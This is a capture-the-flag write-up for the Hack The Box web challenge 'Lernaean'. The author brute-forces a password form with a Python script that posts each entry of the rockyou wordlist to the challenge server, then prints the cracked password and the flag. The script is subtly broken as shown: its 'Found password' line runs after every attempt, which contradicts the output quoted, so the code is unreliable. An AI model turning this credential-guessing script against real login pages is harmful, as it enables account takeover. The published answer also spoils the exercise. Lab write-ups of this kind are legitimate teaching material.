Hack The Box / Challenges / Web / Lernaean

This challenge shows a page with a textbox where the user can put a password.

After some time trying whatever I could remember.. decided to look for an hint. This challenge is rated as being relatively easy. It couldn't be something hard! I was missing something obvious...

I looked around in the internet for Lernaean and tried several words associated but none worked.

From the hint "you've to rockyou" I found a password list from naive-hashcat with that name and I was surprised that password cracking would be needed for this challenge.

Made a simple python script to bruteforce:

#!/usr/bin/env python

from __future__ import print_function

import requests
from time import sleep

with open("rockyou.txt","rb") as f:
    passwords = f.read()
    passwords = passwords.decode('utf-8','ignore').split("\n")

url = "http://docker.hackthebox.eu:48526"
count = 1

for p in passwords:
    print("At password %d of %d..." % (count, len(passwords)))
    data = { 'password': p }
    req = requests.post(url, data=data)
    t = req.text.split("\n")[0]
    if "Invalid password!" in t:
        count += 1
    print("Found password: ", p)

And when trying it I got one password:

    At password 430 of 14344384...
    At password 431 of 14344384...
    At password 432 of 14344384...
    At password 433 of 14344384...
    At password 434 of 14344384...
    Found password:  leonardo

Tried to look around for leonardo and lernaean connection in the Internet but found none. I might need to improve my google skills :)

Trying that password with curl we get the following output:

    <h1 style='color: #fff;'>HTB{l1k3_4_b0s5_s0n}</h1><script type="text/javascript">
                       window.location = "noooooooope.html"
        <title>Login - Lernaean</title>
    <body style="background-color: #cd4e7b;">

We can see the flag in the reply content, first line. HTB{l1k3_4_b0s5_s0n}

jemos / Sep, 6 2019